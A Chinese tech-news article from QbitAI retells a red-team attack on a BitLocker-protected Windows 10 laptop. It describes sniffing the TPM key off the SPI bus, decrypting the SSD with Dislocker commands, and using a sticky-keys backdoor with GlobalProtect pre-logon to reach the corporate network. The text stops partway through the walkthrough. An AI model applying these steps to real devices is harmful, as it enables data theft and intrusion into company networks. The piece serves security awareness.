30分钟从工作电脑入侵公司内网！Win11：更新强制要求有TPM2.0，知道为啥了吧？

量子位

发布于 2023-03-10 12:55:39

6830

发布于 2023-03-10 12:55:39

文章被收录于专栏：量子位

博雯发自凹非寺量子位报道 | 公众号 QbitAI

工作电脑被偷的30分钟后，公司内网就进人了。

不仅拥有活动目录上的基本特权，还能在内部文件中来去自如！

可我那保护重重的Windows防火墙呢？

我那可以生成和存储各种密钥的TPM芯片呢？

黑客到底是怎么越过这些阻碍的？

绕过TPM

好，现在请出我们的受害者——

一台Windows 10系统的联想笔记本电脑。

使用的是微软的BitLocker，通过微软的可信平台模块（TPM）加密。

这时，要提取驱动器解密密钥进而入侵内网，就需要从TPM入手：

不过这是一种结构高度复杂，且含有许多篡改检测和保护的硬件。直接攻击可能会花费大量时间。

因此，我们可以关注一下TPM周围的依赖关系和内容。

比如……并没有使用TPM 2.0标准的加密通信特性的BitLocker。

这意味着从TPM发出的数据都是以明文形式游走在SPI总线上的，包括Windows的解密密钥。

如果能抓住那个密钥，就能够解密驱动器，获得VPN客户端配置的访问权限，进而有访问内部网络的可能。

可现在问题又来了。

要抓取SPI总线上的数据，就要将引线或探针连接到TPM的引脚上。

而这个“引脚”只有0.25毫米宽，0.5毫米间隔，还是一个平放在芯片面上，难以用物理方式连接的伪·引脚。

那有没有更大，更好连接的呢？

还真有：

这是与TPM共享一个SPI总线的CMOS芯片，它的引脚非常清晰分明。

好，Saleae逻辑分析仪，连接！

从预登陆功能的“后门”入侵

现在，探测仪已经连接，开始启动电脑。

我们现在需要在数以百万计的SPI字节中，找到一个正在被发送的BitLocker解密密钥。

先用高级分析器（HLA）进行事务分析：

经过几天的故障排除和比较之后，我们发现了TPM命令包的不同位掩码的组合，以及用于寻找密钥的不同正则表达式。

再用bitlocker-spi-toolkit解析这些请求，钥匙就拿到了！

接下来让我们用钥匙解密固盘（SSD），看看里面到底有什么。

拔出固态硬盘，安装在一个适配器上，然后插上：

在做了一个磁盘镜像之后，我们使用Dislocker工具集来解密驱动器：

$ echo daa0ccb7312<REDACTED> | xxd -r -p > ~/vmk
$ mkdir ~/ssd ~/mounted
$ sudo losetup  -P /dev/loop6 /mnt/hgfs/ExternalSSD/ssd-dd.img 
$ sudo fdisk -l /dev/loop6
    Disk /dev/loop6: 238.47 GiB, 256060514304 bytes, 500118192 sectors
    Units: sectors of 1 * 512 = 512 bytes
    Sector size (logical/physical): 512 bytes / 512 bytes
    I/O size (minimum/optimal): 512 bytes / 512 bytes
    Disklabel type: gpt
    Disk identifier: BD45F9A-F26D-41C9-8F1F-0F1EE74233
    Device         Start       End   Sectors   Size Type
    /dev/loop6p1    2048   1026047   1024000   500M Windows recovery environment
    /dev/loop6p2 1026048   2050047   1024000   500M EFI System
    /dev/loop6p3 2050048   2312191    262144   128M Microsoft reserved
    /dev/loop6p4 2312192 500117503 497805312 237.4G Microsoft basic data <- bitlocker drive
$ sudo dislocker-fuse -K ~/vmk /dev/loop6p4 -- ~/ssd
$ sudo ntfs-3g ~/ssd/dislocker-file ~/mounted
$ ls -al ~/mounted
    total 19156929
    drwxrwxrwx  1 root root        8192 May  5 19:00  .
    drwxrwxrwt 17 root root        4096 Jun 15 09:43  ..
    drwxrwxrwx  1 root root           0 May  6 14:29 '$Recycle.Bin'
    drwxrwxrwx  1 root root           0 May  4 10:55 '$WinREAgent'
    -rwxrwxrwx  1 root root      413738 Dec  7  2019  bootmgr
    -rwxrwxrwx  1 root root           1 Dec  7  2019  BOOTNXT
    lrwxrwxrwx  2 root root          15 May  4 11:18 'Documents and Settings' -> ~/mounted/Users

现在就可以离线访问内容的明文了！

此外，我们还发现了正在使用的VPN客户端: Palo Alto的全球保护（GP）。

GP有一项预登陆（Pre-logon）功能，会对端点（而不是用户）进行身份验证，并允许域脚本或其他任务在端点启动后立即运行。

这样，我们就可以使用粘滞键后门（Sticky Keys Backdoor），在不需要任何凭证的的前提下访问VPN。

有了后门访问之后，我们需要将解密后的Windows映像引导为虚拟机。

因此，先创建一个VMDK，将解密BitLocker分区和加密映像的起始扇区映射到适当的VM分区：

# Disk DescriptorFile
version=1
CID=19362586
parentCID=ffffffff
createType="partitionedDevice"

# Extent description
RW 63 FLAT "ssd-dd.img" 0
RW 1985 FLAT "ssd-dd.img" 2048
RW 1024000 ZERO
RW 1024000 FLAT "ssd-dd.img" 1026048
RW 262144 FLAT "ssd-dd.img" 2050048

# This is the 4th partition where the encrypted bitlocker drive was
RW 497805312 FLAT "dislocker2-file" 0

RW 655 ZERO 
RW 33 FLAT "ssd-dd.img" 63

ddb.virtualHWVersion = "4"
ddb.adapterType="ide"
ddb.geometry.cylinders="16383"
ddb.geometry.heads="16"
ddb.geometry.sectors="63"
ddb.uuid.image="43e1e-5c24-46cc-bcec-daad3d500"
ddb.uuid.parent="00000000-0000-0000-0000-000000000000"
ddb.uuid.modification="8d285-ad86-4227-86d4-ec168b6b3"
ddb.uuid.parentmodification="00000000-0000-0000-0000-000000000000"
ddb.geometry.biosCylinders="1024"
ddb.geometry.biosHeads="255"
ddb.geometry.biosSectors="63"

再使用VMDK和粘滞键后门的WIndows镜像，创建并启动虚拟机，按下WIndows + U：